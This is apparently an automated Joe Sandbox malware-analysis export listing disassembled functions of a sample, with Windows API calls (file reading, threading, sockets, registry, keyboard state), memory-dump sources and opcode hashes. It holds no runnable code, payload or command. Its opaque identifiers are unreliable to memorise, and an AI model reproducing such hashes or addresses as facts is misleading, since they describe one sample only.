                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove$_malloc
                                                                                                • String ID:
                                                                                                • API String ID: 1938898002-0
                                                                                                • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                                • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                                                • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                                • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                                                Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                                • _memmove.LIBCMT ref: 0044B555
                                                                                                • _memmove.LIBCMT ref: 0044B578
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                                                • String ID:
                                                                                                • API String ID: 2737351978-0
                                                                                                • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                                • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                                • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                                • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                                Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                                                • __calloc_crt.LIBCMT ref: 00415246
                                                                                                • __getptd.LIBCMT ref: 00415253
                                                                                                • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                                                • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                                                • _free.LIBCMT ref: 0041529E
                                                                                                • __dosmaperr.LIBCMT ref: 004152A9
                                                                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                • String ID:
                                                                                                • API String ID: 3638380555-0
                                                                                                • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                                                • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                                                Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                                                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$Copy$ClearErrorInitLast
                                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                • API String ID: 3207048006-625585964
                                                                                                • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                                                • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                                                Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                                  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                                                • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                                • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                                • _memmove.LIBCMT ref: 004656CA
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                                • WSACleanup.WSOCK32 ref: 00465762
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                                                • String ID:
                                                                                                • API String ID: 2945290962-0
                                                                                                • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                                • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                                Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                                                • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                                                • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                                                • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                                                • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                                                • String ID:
                                                                                                • API String ID: 1457242333-0
                                                                                                • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                                                • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                                                Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConnectRegistry_memmove_wcslen
                                                                                                • String ID:
                                                                                                • API String ID: 15295421-0
                                                                                                • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                                                • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                                                Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                • _wcstok.LIBCMT ref: 004675B2
                                                                                                  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                • _wcscpy.LIBCMT ref: 00467641
                                                                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                • _wcslen.LIBCMT ref: 00467793
                                                                                                • _wcslen.LIBCMT ref: 004677BD
                                                                                                  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                                                • String ID: X
                                                                                                • API String ID: 780548581-3081909835
                                                                                                • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                                                • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                                                • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                                                • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                                                Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                                                • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                                                • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                                                • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                                                • CloseFigure.GDI32(?), ref: 0044751F
                                                                                                • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                                                • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                • String ID:
                                                                                                • API String ID: 4082120231-0
                                                                                                • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                                                • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                                                Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                                                • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                                                • String ID:
                                                                                                • API String ID: 2027346449-0
                                                                                                • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                                • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                                                • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                                • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                                                Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                • GetMenu.USER32 ref: 0047A703
                                                                                                • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                                                • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                                                • _wcslen.LIBCMT ref: 0047A79E
                                                                                                • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                                                • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                                                • String ID:
                                                                                                • API String ID: 3257027151-0
                                                                                                • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                                • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                                                • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                                • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                                                Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastselect
                                                                                                • String ID:
                                                                                                • API String ID: 215497628-0
                                                                                                • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                                                • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                                                • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                                                • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                                                Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetParent.USER32(?), ref: 0044443B
                                                                                                • GetKeyboardState.USER32(?), ref: 00444450
                                                                                                • SetKeyboardState.USER32(?), ref: 004444A4
                                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
